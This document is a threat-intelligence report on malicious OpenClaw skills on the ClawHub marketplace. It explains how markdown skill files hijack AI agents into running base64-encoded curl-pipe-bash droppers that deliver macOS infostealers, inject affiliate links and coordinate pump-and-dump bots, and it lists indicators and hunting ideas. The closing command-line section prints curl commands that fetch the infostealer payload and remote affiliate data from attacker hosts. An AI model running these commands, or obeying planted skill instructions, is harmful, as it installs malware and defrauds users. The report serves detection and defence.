OpenClaw’s Skill Marketplace and the Emerging AI Supply Chain Threat
Threat actors are exploiting the OpenClaw AI agent ecosystem by publishing malicious skills on the ClawHub marketplace. These skills leverage semantic instruction hijacking to bypass traditional security controls, delivering macOS infostealers via base64-encoded droppers, utilizing massive file padding for defense evasion, and executing novel agentic financial fraud schemes like runtime affiliate injection and front-running.
- domaindownload[.]setup-service[.]comDomain associated with malicious OpenClaw skill activity.
- domaininstall[.]app-distribution[.]netDomain associated with malicious OpenClaw skill activity.
- domainlaosji[.]netDomain used to host malicious referrals.json for runtime affiliate injection.
- domainletssendit[.]funInfrastructure used for coordinated agentic front-running and pump-and-dump schemes.
- ip2[.]26[.]75[.]16C2 server hosting the cluw macOS infostealer payload.
- ip91[.]92[.]242[.]30AMOS C2 server used in early-wave dropper campaigns.
- sha256818aea6143282b352fdfdc0f3ebf77a36e54eb3befb5cad1a355a99ab97c6aa7Hash of the cluw macOS infostealer payload.
- sha256881ce5cb124c4d2e814783724cc1388f6a1cbf6eee274c3f3366e77ba3503ad7Hash of a malicious OpenClaw skill.
- sha256b30eaed1f7478c28f4ec50d07ed5ef014ffbc4b2bc5a38d689ba9f7abb5e19c2Hash of the omnicogg skill utilizing file padding for defense evasion.
- sha256b6c7e0bf573b1c7d9d3a05eb08d26579199515b847df984862805f44a7af8007Hash for the tradingview-ai-indicator-assistant malicious skill.
- sha256ebb73dbb5aac1f6fe1a88e8f26126a1e1aa34c9f3345ad4345189b40d9bf1d1dHash for the money-radar malicious skill.
- sha256f4e41aa269c88bf11a2022701a9cf41e9a186aa1b224d837c31bf34e0b875d0eHash for the letssendit malicious skill.
- urlhxxp://2[.]26[.]75[.]16/XuvewuyurDirect payload URL for the cluw macOS infostealer.
- urlhxxps://laosji[.]net/data/referrals[.]jsonURL hosting dynamic affiliate links for runtime injection.
Detection / HunterGoogle
What Happened
Hackers are uploading malicious add-ons to the OpenClaw AI marketplace to trick users' AI assistants into executing harmful commands. Users and organizations utilizing OpenClaw AI agents, particularly those on Mac computers or involved in financial communities, are affected. This matters because these malicious add-ons can bypass standard security checks to steal sensitive information, like passwords, or use the AI to commit financial fraud. Organizations should carefully review the code and network activity of any AI add-ons they install and restrict AI agent access to trusted sources.
Key Takeaways
- Threat actors are exploiting the OpenClaw AI agent ecosystem via the ClawHub marketplace to distribute malware and conduct financial fraud.
- Malicious skills use semantic instruction hijacking to bypass technical constraints, delivering macOS infostealers like AMOS and cluw.
- Attackers are utilizing file padding (inflating files to 22MB) to successfully bypass automated scanning tools like VirusTotal and ClawScan.
- Novel agentic threats have emerged, including runtime affiliate injection and agentic front-running (pump-and-dump schemes) using coordinated AI bots.
Affected Systems
- macOS
- OpenClaw AI Agent
- ClawHub Marketplace
Attack Chain
Attackers publish malicious skills to the ClawHub marketplace, masquerading as productivity or financial tools. Upon installation, the skills use semantic instruction hijacking via markdown files to execute malicious actions. Initial access often involves a prerequisite block that tricks the agent into executing a base64-encoded curl-pipe-bash command, fetching payloads like the AMOS or cluw infostealers from remote C2 servers. Other skills dynamically fetch malicious affiliate links or coordinate agentic botnets for cryptocurrency pump-and-dump schemes, evading detection through techniques like massive file padding.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, but notes that Palo Alto Networks products (Advanced URL Filtering, DNS Security, WildFire, Cortex XDR) have been updated with behavioral and network indicators to detect these threats.
Detection Engineering Assessment
EDR Visibility: Medium — EDR can detect the execution of curl/bash commands and the dropping of known infostealers, but may struggle to inspect the semantic logic within the AI agent's memory or the padded markdown files. Network Visibility: High — The attacks rely heavily on fetching payloads and configurations from external, undocumented C2 infrastructure such as paste sites and IP addresses. Detection Difficulty: Moderate — While the network indicators and final payloads are standard, the initial delivery mechanism via AI agent semantic hijacking and file padding can bypass traditional static analysis and web gateways.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon Event ID 1)
- Network Connections (Sysmon Event ID 3 / Firewall logs)
- File Creation (Sysmon Event ID 11)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for AI agent processes (e.g., OpenClaw) spawning shell interpreters (bash, sh) that execute curl or wget commands to external IP addresses or paste sites. | Process Creation, Command Line Logging | Execution | Low to Medium |
| If you have visibility into network traffic, consider hunting for connections to known paste sites (rentry.co, glot.io) originating from AI agent processes. | Network Connections, DNS Queries | Command and Control | Medium |
| Consider hunting for abnormally large markdown files (e.g., >10MB) within AI skill directories, which may indicate binary padding evasion techniques. | File System Monitoring | Defense Evasion | Low |
Control Gaps
- Static analysis tools that skip large files (e.g., >20MB)
- Lack of isolation between AI agent skill logic and the agent's system authority
Key Behavioral Indicators
- Base64 encoded strings within SKILL.md or README.md files
- AI agent processes piping curl output directly to bash
- Unexpected cron job creation by AI agent processes
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider blocking the identified C2 IP addresses and malicious domains (e.g., 2.26.75.16, 91.92.242.30, laosji.net) at the network perimeter.
- Evaluate whether to audit and remove the specific malicious OpenClaw skills (e.g., omnicogg, money-radar, letssendit) from your environment.
Infrastructure Hardening
- Consider implementing network segmentation to restrict AI agent outbound access to only explicitly approved domains.
- Evaluate whether to enforce strict file size limits and deep inspection for all downloaded AI agent skills, ensuring padded files are not bypassed by scanners.
User Protection
- If your EDR supports it, consider monitoring AI agent processes for suspicious child processes like shell interpreters or curl commands.
- Evaluate whether to restrict the installation of third-party AI skills to a pre-approved, internally vetted repository.
Security Awareness
- Consider training developers and users on the risks of AI supply chain attacks and the importance of verifying the source and behavior of AI skills.
- Evaluate whether to include AI agent semantic hijacking scenarios in future security awareness exercises.
MITRE ATT&CK Mapping
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1140 - Deobfuscate/Decode Files or Information
- T1027.001 - Obfuscated Files or Information: Binary Padding
- T1053.003 - Scheduled Task/Job: Cron
- T1566 - Phishing
Additional IOCs
- Domains:
download[.]setup-service[.]com- Domain associated with malicious OpenClaw skill activity.install[.]app-distribution[.]net- Domain associated with malicious OpenClaw skill activity.
- Urls:
91.92.242.30/lamq4- URL for AMOS C2 payload delivery.glot.io/snippets/hfd3x9ueu5- Paste-site redirect intermediary used in macOS targeting.github.com/Ddoy233/openclawcli- Malicious repository associated with the campaign.openclawcli.vercel.app- Malicious infrastructure hosted on Vercel.hxxp://2[.]26[.]75[.]16/Xuvewuyur- Direct payload URL for the cluw macOS infostealer.hxxps://laosji[.]net/data/referrals.json- URL hosting dynamic affiliate links for runtime injection.
- File Hashes:
881ce5cb124c4d2e814783724cc1388f6a1cbf6eee274c3f3366e77ba3503ad7(sha256) - Hash of a malicious OpenClaw skill.b6c7e0bf573b1c7d9d3a05eb08d26579199515b847df984862805f44a7af8007(sha256) - Hash for the tradingview-ai-indicator-assistant malicious skill.ebb73dbb5aac1f6fe1a88e8f26126a1e1aa34c9f3345ad4345189b40d9bf1d1d(sha256) - Hash for the money-radar malicious skill.f4e41aa269c88bf11a2022701a9cf41e9a186aa1b224d837c31bf34e0b875d0e(sha256) - Hash for the letssendit malicious skill.
- Command Lines:
- Purpose: Fetches and executes the cluw macOS infostealer payload. | Tools:
curl,bash| Stage: Execution |curl -fsSL http://2.26.75.16/Xuvewuyur - Purpose: Fetches malicious affiliate links for runtime injection. | Tools:
curl,python3| Stage: Execution |curl -s "https://laosji.net/data/referrals.json" | python3 -c
- Purpose: Fetches and executes the cluw macOS infostealer payload. | Tools: